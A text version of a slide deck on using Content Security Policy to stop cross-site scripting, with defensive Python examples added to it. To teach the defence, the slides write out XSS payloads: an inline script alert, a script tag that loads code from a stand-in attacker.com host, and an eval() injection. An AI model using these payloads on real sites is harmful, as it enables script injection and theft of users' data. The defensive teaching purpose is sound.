1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
Preventing XSS with Content Security Policy (CSP)
Ksenia Dmitrieva
Introduction
Who am I?
• Senior Security Consultant @Cigital
• @KseniaDmitrieva
• Ballroom dancer
Content Security Policy (CSP) Agenda
Questions to answer today:
• Why do we need CSP?
• What is CSP?
• How is the policy configured and enforced?
• How is CSP applied to existing web applications?
• What improvements is CSP 1.1 bringing?
• More questions?
How to Protect from XSS?
Slide diagram: the three XSS classes that a defence has to cover: reflected, stored (via the DB) and DOM-based.
Ways to Exploit an XSS: Injecting inline JavaScript
Malicious request:
GET http://example.com/index.html?s=<script>alert('xss');</script>
Vulnerable server-side JSP code (the parameter is written into the page unencoded):
<%
  String search_word = request.getParameter("s");
%>
<p> Search results for (<%= search_word %>)</p>
What the server effectively executes for this request:
<%
  String search_word = "<script>alert('xss');</script>";
%>
Server response:
<p> Search results for <script>alert('xss');</script></p>
Ways to Exploit an XSS: Injecting a third-party JavaScript
Malicious request:
GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/>
Vulnerable server-side JSP code:
<%
  String search_word = request.getParameter("s");
%>
<p> Search results for (<%= search_word %>)</p>
What the server effectively executes for this request:
<%
  String search_word = "apple<script src=\"http://attacker.com/parse_page.js\"/>";
%>
Server response:
<p> Search results for apple<script src="http://attacker.com/parse_page.js"/></p>
Ways to Exploit an XSS: Injecting into eval()
Vulnerable JavaScript:
var function_name = "display";
var user_input = document.getElementById("parameter").value;
eval(function_name+"('"+user_input+"');");
Result with benign input: display('firstname');
Malicious input:
user_input="firstname'); alert('xss";
JavaScript that eval() now receives:
eval("display"+"('"+"firstname'); alert('xss"+"');");
Result: display('firstname'); alert('xss');
What is Content Security Policy?
CSP defines a list of resource directives:
• script-src
• connect-src
• font-src
• frame-src
• style-src
• img-src
• media-src
• object-src
Slide diagram: a form page (First Name, Last Name, Address, Email, Submit) surrounded by the resources CSP controls:
third-party <iframe src="http://attacker.com/hello.htm"></iframe>
<script> Inline JavaScript </script>
<script src="https://malicioussites.com/spam.js"></script>
<script src="https://jquery.org/libraries/jquery.js"></script>
Content Security Policy:
• Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval().
• Imposes restrictions on resources based on their origin.
Sample CSP Policies
Policy is sent by the server as an HTTP header:
Content-Security-Policy: script-src 'self' https://apis.google.com
Any malicious inline scripts or scripts hosted elsewhere will not be executed.

Can a page with the following policy load an image from http://www.bbc.com/?
Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *

Can a page with the following policy load a script from http://attacker.com?
Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com
X (blocked)

Can a page with the following policy load a CSS from http://wordpress.org?
Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none'

Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
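The three questions above are answered by the same two rules a browser applies: a resource type is governed by its own directive, falling back to default-src when that directive is absent (and unrestricted when neither is present), and a source list matches by origin. The following evaluator is an added example written for this page, not code from the deck or from any browser; it implements CSP 1.0 fetch-directive matching for the source expressions the slides use ('self', 'none', *, scheme:, host patterns with optional wildcard and port; paths are ignored, and a scheme-less host also allows an https upgrade as in CSP 1.1). The page URL http://www.mydomain.com/ and the resource URLs under each host are assumptions needed to make the questions concrete.

```python
"""Minimal CSP 1.0 fetch-directive evaluator (added example, not the deck's code)."""
from urllib.parse import urlsplit

# Resource types the evaluator understands, mapped to the directive that governs them.
RESOURCE_DIRECTIVE = {
    "script": "script-src", "style": "style-src", "img": "img-src",
    "font": "font-src", "frame": "frame-src", "object": "object-src",
    "media": "media-src", "connect": "connect-src",
}
DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_policy(header):
    """'default-src 'self' a.com; img-src *' -> {'default-src': ["'self'", 'a.com'], 'img-src': ['*']}"""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])  # duplicates are ignored, as in CSP
    return policy


def _origin(url):
    parts = urlsplit(url)
    return parts.scheme.lower(), parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme.lower())


def _matches(expr, resource_url, page_url):
    """Does one source expression allow resource_url for a page at page_url?"""
    r_scheme, r_host, r_port = _origin(resource_url)
    p_scheme, p_host, p_port = _origin(page_url)
    expr = expr.lower()
    if expr == "'none'":
        return False
    if expr == "'self'":
        return (r_scheme, r_host, r_port) == (p_scheme, p_host, p_port)
    if expr.startswith("'"):          # 'unsafe-inline', 'unsafe-eval': never a URL match
        return False
    if expr == "*":
        return True
    if expr.endswith(":") and "/" not in expr:   # scheme-source such as https:
        return r_scheme == expr[:-1]
    # host-source: [scheme://]host[:port][/path]; host may start with "*."
    scheme = None
    if "://" in expr:
        scheme, expr = expr.split("://", 1)
    host_port = expr.split("/", 1)[0]          # paths are ignored in this evaluator
    host, _, port = host_port.partition(":")
    if scheme is not None and scheme != r_scheme:
        return False
    if scheme is None and r_scheme != p_scheme and r_scheme != "https":
        return False                           # scheme-less host never allows a downgrade
    if host.startswith("*."):
        if not r_host.endswith(host[1:]):
            return False
    elif host != r_host:
        return False
    if port == "":
        return r_port == DEFAULT_PORTS.get(r_scheme)
    return port == "*" or (port.isdigit() and int(port) == r_port)


def allowed(header, page_url, resource_url, resource_type):
    """True if a page at page_url served with this CSP may load resource_url as resource_type."""
    policy = parse_policy(header)
    sources = policy.get(RESOURCE_DIRECTIVE[resource_type])
    if sources is None:
        sources = policy.get("default-src")    # fallback when the specific directive is absent
    if sources is None:
        return True                            # no governing directive at all: unrestricted
    return any(_matches(e, resource_url, page_url) for e in sources)


# The three slide questions; the page location and the exact resource paths are assumptions.
PAGE = "http://www.mydomain.com/index.html"
QUESTIONS = [
    ("default-src 'self' *.mydomain.com; img-src *", "http://www.bbc.com/logo.png", "img"),
    ("default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com",
     "http://attacker.com/evil.js", "script"),
    ("script-src 'self'; frame-src 'none'; object-src 'none'", "http://wordpress.org/style.css", "style"),
]


def answer_slide_questions():
    """[image from bbc.com, script from attacker.com, CSS from wordpress.org] -> [True, False, True]"""
    return [allowed(header, PAGE, url, kind) for header, url, kind in QUESTIONS]


if __name__ == "__main__":
    for (header, url, kind), ok in zip(QUESTIONS, answer_slide_questions()):
        print(f"{kind:6} {url:32} {'allowed' if ok else 'blocked':8} [{header}]")
```

The third answer is the one to notice: with no style-src and no default-src, the policy says nothing about stylesheets, so the CSS loads. A policy that only names script-src leaves every other resource type unrestricted, which is why the slide ends by recommending default-src plus frame-src and object-src.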
CSP Reporting
Report violations of the policy to the server: report-uri directive
Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php;
Sample reported JSON:
{
  "csp-report": {
    "document-uri": "http://example.com/page.html",
    "referrer": "http://evil.example.com/",
    "blocked-uri": "http://evil.example.com/evil.js",
    "violated-directive": "script-src 'self' https://apis.google.com",
    "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php"
  }
}
Different browsers format reports differently!
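The report endpoint receives untrusted input: anyone can POST a body to it, field sets vary by browser, and browser extensions generate violations that have nothing to do with the site. The handler below is an added example for this page, not the deck's parser.php; it bounds the body size, accepts only a JSON object with a csp-report member, fills absent fields with None so later code never depends on one browser's field set, and tallies blocked URIs per directive, which is the table you read after a Report-Only rollout. The second sample report, the 16 KiB limit and the extension-scheme noise list are assumptions of this example.

```python
"""Defensive CSP violation-report handler (added example, not the deck's parser.php)."""
import json

MAX_REPORT_BYTES = 16 * 1024          # assumed bound; reject oversized bodies before parsing
FIELDS = ("document-uri", "referrer", "blocked-uri", "violated-directive",
          "effective-directive", "original-policy", "source-file", "line-number")
# Violations attributed to browser extensions are noise for the site's own policy (assumed list).
NOISE_PREFIXES = ("chrome-extension://", "moz-extension://", "safari-extension://")


def normalize_report(body):
    """Flat dict with every FIELDS key (None when the browser omitted it), or None if body is not a report."""
    if len(body) > MAX_REPORT_BYTES:
        return None
    try:
        data = json.loads(body)
    except ValueError:                 # malformed JSON or undecodable bytes
        return None
    report = data.get("csp-report") if isinstance(data, dict) else None
    if not isinstance(report, dict):
        return None
    record = {f: report.get(f) for f in FIELDS}
    # Some browsers send only violated-directive (the whole source list), others also
    # effective-directive (the directive name); derive a bare name that works for both.
    directive = record["effective-directive"] or record["violated-directive"] or ""
    record["directive-name"] = directive.split()[0] if directive.split() else None
    return record


def is_noise(record):
    """True for violations caused by extensions rather than by page content."""
    blocked = record.get("blocked-uri") or ""
    return blocked.startswith(NOISE_PREFIXES)


def summarize(records):
    """{(directive name, blocked URI): count} over valid, non-noise reports."""
    counts = {}
    for r in records:
        if r is None or is_noise(r):
            continue
        key = (r["directive-name"], r["blocked-uri"])
        counts[key] = counts.get(key, 0) + 1
    return counts


# Sample 1 is the report shown on the slide; sample 2 is constructed to show a different field set.
SLIDE_REPORT = b'''{ "csp-report": {
  "document-uri": "http://example.com/page.html",
  "referrer": "http://evil.example.com/",
  "blocked-uri": "http://evil.example.com/evil.js",
  "violated-directive": "script-src 'self' https://apis.google.com",
  "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php"
} }'''
CONSTRUCTED_REPORT = b'''{ "csp-report": {
  "document-uri": "http://example.com/page.html",
  "blocked-uri": "chrome-extension://abcdefghijklmnop/inject.js",
  "effective-directive": "script-src",
  "violated-directive": "default-src 'self'"
} }'''


def demo():
    """Feed both samples (the slide report twice) through the pipeline."""
    batch = [SLIDE_REPORT, SLIDE_REPORT, CONSTRUCTED_REPORT, b"not json at all"]
    return summarize(normalize_report(b) for b in batch)


if __name__ == "__main__":
    for (directive, uri), n in demo().items():
        print(f"{n:4}  {directive:12} {uri}")
```

Keep the summary keyed on the bare directive name: violated-directive carries the full source list, so two browsers reporting the same block would otherwise land in different buckets.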
CSP Reporting and Enforcing
• The Content-Security-Policy header enforces the policy; with report-uri it also reports violations
• The Content-Security-Policy-Report-Only header reports policy violations, but does not enforce the policy
Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php
• Use both headers: one to enforce the old policy and another to test out the new policy
Content-Security-Policy: default-src 'self' *.google.com;
Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
Externalizing JavaScript
Externalize all inline script, inline CSS, event handlers and eval() constructs.

Without CSP: Page.html
<!doctype html>
<html>
<head>
  <title>My Page</title>
  <script type="text/javascript">
    function repeated() { ... }
    function clickHandler(element) {
      setTimeout("console.log('lapse'); repeated()", 1000);
    }
    function init() { ... }
  </script>
</head>
<body onload="init();">
  <button onclick="clickHandler(this)">
    Click me!
  </button>
</body>
</html>

With CSP: Page.html
<!doctype html>
<html>
<head>
  <title>My Page</title>
  <script src="mypage.js"></script>
</head>
<body>
  <button>Click me!</button>
</body>
</html>

With CSP: mypage.js
function repeated() {...}
function repeatedTask() {
  console.log('lapse');
  repeated();
}
function clickHandler(e) {
  setTimeout(repeatedTask, 1000);
}
function init() {...}
document.addEventListener('DOMContentLoaded',
  function () {
    document.querySelector('button')
      .addEventListener('click', clickHandler);
    init();
  });
CSP Adoption
Source: http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/
CSP 1.0 is supported by the following browsers:
• Internet Explorer: partial support, requires a prefix (X-Content-Security-Policy)
• Firefox desktop 23, Firefox for Android 30
• Chrome desktop 25, Chrome for Android 35
• Safari desktop 7, iOS Safari 7
• Opera desktop 22
• Opera Mini: no support
CSP adoption rate is slow. Most of the CSP policies use unsafe directives: unsafe-eval, unsafe-inline.
Real World CSP Adoption Examples
Twitter uses CSP on all their services (January 2015). Two of the policies it sends:
Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe-eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;
Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
Real World CSP Adoption Examples
Yelp uses CSP on www.yelp.com (January 2015).
Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
Content Security Policy 1.1
Using unsafe-eval and unsafe-inline is equal to turning the CSP off!
CSP 1.1 (or level 2) addresses the issue of broken policies:
• nonce-source directive
• hash-source directive
• policies in <meta> tags
CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014
CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
Nonce Directive
• Add a nonce attribute to every inline script in the page
<script nonce="ZDU4eHjBDQ">
function onButtonClick()
…
</script>
• Add the nonce to the script-src directive as a 'nonce-…' source
Content-Security-Policy: script-src 'nonce-ZDU4eHjBDQ' 'self'
• Set a new nonce each time the page is requested
• Do not automatically add a nonce to every JavaScript in the response
• Add a nonce to inline JavaScript in the view template
Hash-source Directive
Will the nonce directive prevent DOM-based XSS in dynamically generated JavaScript?
<script>
function onButtonClick()
…
</script>
X
Solution: mark every inline JavaScript with a hash!
• Directive 'hash-source' sends a hash of each inline script in the response
• The browser hashes every inline JavaScript and compares the hashes
Hash the script and add a Base64-encoded value to the CSP header:
Content-Security-Policy: default-src 'self'; script-src 'sha256-MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJlYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ=='
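The two preceding slides (nonce-source and hash-source) describe one browser rule from two sides: an inline script runs only if its nonce attribute equals a 'nonce-…' source in script-src, or the SHA-256 of its exact body, base64-encoded, equals a 'sha256-…' source. The following is an added example written for this page, not the deck's code: it generates a fresh nonce per response, puts it only on the template's own inline script, computes hash-sources for static inline scripts (base64 of the raw digest, as CSP 1.1 specifies, not of its hex form), assembles the header, and then applies the browser rule to every inline script in the rendered page so that an injected script, like the one from slide 6, is seen to fail both checks. The template, the `{{nonce}}` placeholder convention and the 16-byte nonce length are assumptions of this example.

```python
"""Nonce-source and hash-source for inline scripts under CSP 1.1 (added example, not the deck's code)."""
import base64
import hashlib
import re
import secrets


def new_nonce():
    """A fresh, unguessable nonce for one response: 16 random bytes (assumed length), base64."""
    return base64.b64encode(secrets.token_bytes(16)).decode("ascii")


def hash_source(script_body):
    """'sha256-<base64 of the raw SHA-256 digest>' over exactly the text between <script> and </script>."""
    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def render_page(template, nonce):
    """Substitute the per-request nonce into the view template only (never into user-controlled output)."""
    return template.replace("{{nonce}}", nonce)


def script_src_header(nonce, static_scripts):
    """script-src allowing same-origin files, this response's nonce, and the known static inline scripts."""
    sources = ["'self'", f"'nonce-{nonce}'"] + [f"'{hash_source(s)}'" for s in static_scripts]
    return "Content-Security-Policy: script-src " + " ".join(sources)


SCRIPT_RE = re.compile(r"<script(?P<attrs>[^>]*)>(?P<body>.*?)</script>", re.S)


def inline_scripts_allowed(html, header):
    """Apply the browser rule to each inline <script> in order: allowed iff nonce or hash matches."""
    sources = header.split("script-src", 1)[1].split(";")[0].split()
    nonces = {s[len("'nonce-"):-1] for s in sources if s.startswith("'nonce-")}
    hashes = {s.strip("'") for s in sources if s.startswith("'sha256-")}
    results = []
    for m in SCRIPT_RE.finditer(html):
        if re.search(r"\bsrc=", m.group("attrs")):
            continue                       # external scripts are matched by host-source instead
        nonce_attr = re.search(r'nonce="([^"]*)"', m.group("attrs"))
        ok = (nonce_attr is not None and nonce_attr.group(1) in nonces) \
            or hash_source(m.group("body")) in hashes
        results.append(ok)
    return results


# Constructed view template: one nonced template script, one static script authorized by hash,
# and one script that arrives through reflected user input (the payload from slide 6).
TEMPLATE = """<!doctype html>
<html><head>
<script nonce="{{nonce}}">function onButtonClick() { console.log('clicked'); }</script>
<script>console.log('static analytics stub');</script>
</head><body>
<p> Search results for (<script>alert('xss');</script>)</p>
</body></html>"""
STATIC_INLINE_SCRIPTS = ["console.log('static analytics stub');"]


def demo():
    """Render one response and report, per inline script, whether the browser would run it."""
    nonce = new_nonce()
    html = render_page(TEMPLATE, nonce)
    header = script_src_header(nonce, STATIC_INLINE_SCRIPTS)
    return inline_scripts_allowed(html, header)      # [True, True, False]


if __name__ == "__main__":
    nonce = new_nonce()
    print(script_src_header(nonce, STATIC_INLINE_SCRIPTS))
    print(demo())
```

Two details carry the security argument. The nonce must be generated per response with a CSPRNG: a fixed or predictable value lets injected markup simply reuse it, which is why the slide says not to stamp it on every script automatically. The hash covers the script body byte for byte, so any whitespace or build-time change to a static inline script silently breaks it until the header is regenerated; computing the sources from the same files at build time, as here, keeps them in step.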
Q&A
Resources:
• W3C Standard for CSP 1.1: http://www.w3.org/TR/CSP11/
• CSP Reference: http://content-security-policy.com/
• An Introduction to CSP by Mike West: http://www.html5rocks.com/en/tutorials/security/content-security-policy/
• Making CSP Work for You by Mark Goodwin: https://www.youtube.com/watch?v=F7eCP08nacI&t=2h14m16s
• Automatic XSS protection with CSP by Neil Matatall: https://blog.matatall.com/2013/09/automatic-xss-protection-with-csp-no-changes-required/
• Generating Content-Security-Policies, the easy way: http://c0nrad.io/blog/csp.html
@KseniaDmitrieva
kdmitrieva@cigital.com

More Related Content

What's hot

What's hot (20)

Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
Web application security
Web application securityWeb application security
Web application security
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Brute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptxBrute Force Attack and Its Prevention.pptx
Brute Force Attack and Its Prevention.pptx
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
CSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive DesignCSS3, Media Queries, and Responsive Design
CSS3, Media Queries, and Responsive Design
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web application security
Web application securityWeb application security
Web application security
 

Viewers also liked

BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity ModelBSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
Cigital
 

Viewers also liked (20)

Synopsys jul1411
Synopsys jul1411Synopsys jul1411
Synopsys jul1411
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Surfer en toute legalite sur le net
Surfer en toute legalite sur le netSurfer en toute legalite sur le net
Surfer en toute legalite sur le net
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
AppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the UglyAppSec California 2017 CSP: The Good, the Bad and the Ugly
AppSec California 2017 CSP: The Good, the Bad and the Ugly
 
AppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSPAppSec USA 2016: Demystifying CSP
AppSec USA 2016: Demystifying CSP
 
Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy Formation expliquer internet et la loi par Vincent Ruy
Formation expliquer internet et la loi par Vincent Ruy
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your WebappGetting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Web Security Automation: Spend Less Time Securing your Applications
 	  Web Security Automation: Spend Less Time Securing your Applications 	  Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
 
Security HTTP Headers
Security HTTP HeadersSecurity HTTP Headers
Security HTTP Headers
 
BSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity ModelBSIMM-V: The Building Security In Maturity Model
BSIMM-V: The Building Security In Maturity Model
 
SYNOPSIS WRITING
SYNOPSIS WRITINGSYNOPSIS WRITING
SYNOPSIS WRITING
 
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
BAROMETRE 2016 | Les pratiques numériques et la maîtrise des données personne...
 
Intervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchandsIntervention CNIL : droit des internautes et obligations des e-marchands
Intervention CNIL : droit des internautes et obligations des e-marchands
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Similar to Preventing XSS with Content Security Policy

[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
Christopher Schmitt
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
Christopher Schmitt
 
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
Jollen Chen
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 

Similar to Preventing XSS with Content Security Policy (20)

Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
Best Practices for Scalable Monitoring (ENT310-S) - AWS re:Invent 2018
 
Web Security - CSP & Web Cryptography
Web Security - CSP & Web CryptographyWeb Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
 
How to React to JavaScript Insecurity
How to React to JavaScript InsecurityHow to React to JavaScript Insecurity
How to React to JavaScript Insecurity
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas KonradSBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
SBA Live Academy: A Primer in Single Page Application Security by Thomas Konrad
 
[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD[cssdevconf] Adaptive Images in RWD
[cssdevconf] Adaptive Images in RWD
 
[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design[html5tx] Adaptive Images in Responsive Web Design
[html5tx] Adaptive Images in Responsive Web Design
 
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
ATAGTR2017 Test Approach for Re-engineering Legacy Applications based on Micr...
 
The importance of normalizing your security data to ECS
The importance of normalizing your security data to ECSThe importance of normalizing your security data to ECS
The importance of normalizing your security data to ECS
 
[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design[rwdsummit2012] Adaptive Images in Responsive Web Design
[rwdsummit2012] Adaptive Images in Responsive Web Design
 
Using AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3MUsing AWS to Achieve Both Autonomy and Governance at 3M
Using AWS to Achieve Both Autonomy and Governance at 3M
 
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3MDEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
DEV332_Using AWS to Achieve Both Autonomy and Governance at 3M
 
Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014Running your Spring Apps in the Cloud Javaone 2014
Running your Spring Apps in the Cloud Javaone 2014
 
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analystsMeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
MeasureCamp IX (London) - 10 JavaScript Concepts for web analysts
 
Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2Secure Development on the Salesforce Platform - Part 2
Secure Development on the Salesforce Platform - Part 2
 
Integrating Application Security into a Software Development Process
Integrating Application Security into a Software Development ProcessIntegrating Application Security into a Software Development Process
Integrating Application Security into a Software Development Process
 
Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJS
 
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
課程名稱:八屏一雲時代來臨 教你HTML5六小時打通(2)
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 

Recently uploaded

%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
